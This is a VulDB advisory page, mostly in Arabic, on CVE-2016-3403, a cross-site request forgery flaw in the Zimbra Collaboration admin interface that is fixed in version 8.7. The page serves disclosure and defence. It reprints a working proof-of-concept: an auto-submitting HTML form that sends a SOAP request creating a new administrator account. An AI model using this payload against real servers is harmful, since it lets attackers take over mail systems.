VDB-95285 · CVE-2016-3403 · BID 95383

Synacor Zimbra Collaboration حتى 8.6 Administration Interface تزوير طلبات عبر المواقع

CVSS الدرجة المؤقتة للميتاسعر الإكسبلويت الحالي (≈)درجة اهتمام CTI
6.3$0-$5k0.00

الملخصالمعلومات

تم التعرف على ثغرة أمنية في Synacor Zimbra Collaboration حتى 8.6. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية أثرت على دالة غير معروفة من العنصر Administration Interface. تؤدي عملية التلاعب إلى تزوير طلبات عبر المواقع. الثغرة الأمنية هذه تم تسميتهاCVE-2016-3403. يمكن البدأ بالهجوم هذا عن بعد. بالإضافة إلى ذلك، يتوفر استغلال. يُنصح بترقية المكون المتأثر.

التفاصيلالمعلومات

تم التعرف على ثغرة أمنية في Synacor Zimbra Collaboration حتى 8.6. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية أثرت على دالة غير معروفة من العنصر Administration Interface. تؤدي عملية التلاعب إلى تزوير طلبات عبر المواقع. عند استخدام CWE لتحديد المشكلة، سيتم التوجيه إلى CWE-352. تم اكتشاف الثغرة في 11/01/2017. تم إصدار التحذير حول الضعف 11/01/2017 عن طريق Anthony Laou-Hine Tsuei بالتعاون مع Sysdream Labs برقم [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions كـ Mailinglist Post (Full-Disclosure). يمكن قراءة الاستشارة من هنا seclists.org. تم النشر بالتنسيق مع الشركة المالكة.

الثغرة الأمنية هذه تم تسميتهاCVE-2016-3403. تم تعيين CVE في 17/03/2016. يمكن البدأ بالهجوم هذا عن بعد. لا تتوفر معلومات تقنية. معدل انتشار هذه الثغرة أقل من المعدل العام. بالإضافة إلى ذلك، يتوفر استغلال. تم الكشف عن الاستغلال للعامة وقد يتم استخدامه. وقد أشار الاستشاري إلى أن:

Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra, giving possibilities like adding, modifying and removing admin accounts.

إذا تم تحديد إثبات المفهوم، فإنه يُعلن كـ إثبات المفهوم. يمكن تحميل الإكسبلويت من هناseclists.org. تم اعتبار الثغرة استغلال يوم-صفر غير معلن لمدة لا تقل عن 322 يومًا. لكونها ثغرة هجوم فوري متوسط سعرها كان$0-$5k. الكود المستخدم في الاستغلال هو:

<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest";
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope";><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks () ubuntu fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'

value='"sn">itworks</a><a xmlns="" n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/> </form> <script> document.forms[0].submit(); </script> </body> </html>

إذا تمت الترقية إلى الإصدار 8.7، يمكن معالجة هذه المشكلة. يُنصح بترقية المكون المتأثر.

إذا كانت قائمة قواعد بيانات المصدر تحتوي على عناصر، فإن الثغرة موثقة أيضًا في قواعد بيانات ثغرات أخرى: SecurityFocus (BID 95383).

منتجالمعلومات

النوع

المجهز

الأسم

النسخة

الرخصة

موقع إلكتروني

CPE 2.3المعلومات

CPE 2.2المعلومات

CVSSv4المعلومات

VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv3المعلومات

VulDB الدرجة الأساسية للميتا: 6.6
VulDB الدرجة المؤقتة للميتا: 6.4

VulDB الدرجة الأساسية: 4.3
VulDB الدرجة المؤقتة: 3.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

NVD الدرجة الأساسية: 8.8
NVD متجه: 🔍

CVSSv2المعلومات

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
متجهالتعقيدتوثيقالسريةالأمانةالتوفر
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح

VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍

NVD الدرجة الأساسية: 🔍

استغلالالمعلومات

الفئة: تزوير طلبات عبر المواقع
CWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍

ملموس: لا
محلي: لا
عن بُعد: نعم

التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: Anthony Laou-Hine Tsuei
لغة البرمجة: 🔍
تحميل: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

تقدير السعر: 🔍
تقدير السعر الحالي: 🔍

0-Dayافتحافتحافتحافتح
اليومافتحافتحافتحافتح

استخبارات التهديدالمعلومات

الاهتمام: 🔍
الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍

إجراءات مضادةالمعلومات

التوصية: ترقية
الحالة: 🔍

زمن الهجوم الفوري: 🔍
وقت تأخير الاستغلال: 🔍

ترقية: Zimbra Collaboration 8.7

الجدول الزمنيالمعلومات

24/02/2016 🔍
24/02/2016 +0 أيام 🔍
17/03/2016 +22 أيام 🔍
11/01/2017 +300 أيام 🔍
11/01/2017 +0 أيام 🔍
11/01/2017 +0 أيام 🔍
11/01/2017 +0 أيام 🔍
13/01/2017 +2 أيام 🔍
17/05/2017 +124 أيام 🔍
28/10/2022 +1990 أيام 🔍

المصادرالمعلومات

المجهز: synacor.com

استشارة: [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface - all versions
باحث: Anthony Laou-Hine Tsuei
منظمة: Sysdream Labs
الحالة: مؤكد
تأكيد: 🔍
منسق: 🔍

CVE: CVE-2016-3403 (🔍)
GCVE (CVE): GCVE-0-2016-3403
GCVE (VulDB): GCVE-100-95285
SecurityFocus: 95383 - Zimbra CVE-2016-3403 Multiple Cross Site Request Forgery Vulnerabilities

scip Labs: https://www.scip.ch/en/?labs.20161013

إدخالالمعلومات

تم الإنشاء: 13/01/2017 12:13 PM
تم التحديث: 28/10/2022 03:00 PM
التغييرات: 13/01/2017 12:13 PM (76), 03/02/2020 05:44 PM (4), 28/10/2022 03:00 PM (3)
كامل: 🔍
Cache ID: 216::103

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

مناقشة

لا توجد تعليقات بعد اللغات: ar + fa + en.

يرجى تسجيل الدخول حتى تتمكن من التعليق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!